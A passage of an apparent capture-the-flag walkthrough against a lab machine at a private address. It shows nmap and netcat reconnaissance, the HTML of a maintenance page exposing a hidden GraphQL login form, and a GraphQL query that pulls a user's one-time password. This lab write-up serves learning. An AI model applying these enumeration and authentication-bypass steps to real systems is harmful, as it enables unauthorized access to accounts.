Portal to my Matrix (Professional Portfolio)
Target 192.168.213.170
nmap 192.168.213.170 -p 22,80,5132,8433 -sV -vvv -T4 --open -Pn
New option --open = only shows open ports
Also tip for -Pn is if I know a port is open but being blocked by a firewall or a proxy etc, I can force normal scanning since nmap will typically scan if it sees the host is up.
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
5132/tcp open unknown syn-ack
8433/tcp open http syn-ack Werkzeug httpd 2.0.2 (Python 3.8.10)
Check the website on 80
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Under Maintainence</title>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<style>
body {
background: #dedede;
}
.page-wrap {
min-height: 100vh;
}
</style>
</head>
<body>
<div class="page-wrap d-flex flex-row align-items-center">
<div class="container">
<div class="row justify-content-center">
<div class="col-md-12 text-center">
<span class="display-1 d-block">Under Maintainence</span>
<div class="mb-4 lead">For sometime web UI will stay down, please use the CLI application on port 5132</div>
</div>
</div>
</div>
</div>
<!--commenting the code until we fix the whole application-->
<!--<div class="row">-->
<!--<div class="col-lg-4 col-sm-offset-2">-->
<!--<div class="panel panel-primary">-->
<!--<div class="panel-heading">Login</div>-->
<!--<div class="panel-body">-->
<!--<div class="col-md-6">-->
<!--<form method="post" action="http://127.0.0.1:8433/graphql?query={login(username:$uname, password:$pswd)}" enctype="multipart/form-data">-->
<!--<div class="form-group">-->
<!--<label for="uname">Username</label>-->
<!--<input type="text" placeholder="username" name="uname" class="form-control"><br>-->
<!--<label for="pswd">Password</label>-->
<!--<input type="text" placeholder="password" name="pswd" class="form-control"><br>-->
<!--<button class="btn btn-primary" type="submit">Submit</button>-->
<!--</div>-->
<!--</form>-->
<!--</div>-->
<!--</div>-->
<!--<div class="panel-footer">-->
<!--<center>-->
<!--<p style="font-size:2em;color: black"> </p>-->
<!--</center>-->
<!--</div>-->
<!--</div>-->
<!--</div>-->
<!--</div>-->
</body>
</body>
</html>
Now to check port 5132
Run nc to check
nc -v 192.168.213.170 5132
nc -v 192.168.213.170 5132
192.168.213.170: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.213.170] 5132 (?) open
Enter Username: admin One Shot
Enter OTP: 3425752 Random
Incorrect username or password
Service asks for an OTP
8433 runs GraphQL with the login format as seen in the code comments
Use graphQL to pull data from the app
{
getOTP(username:"peter")
}
{
"data": {
"getOTP": "Your One Time Password is: nuWWLk8Ub05tP6zJ"
}
}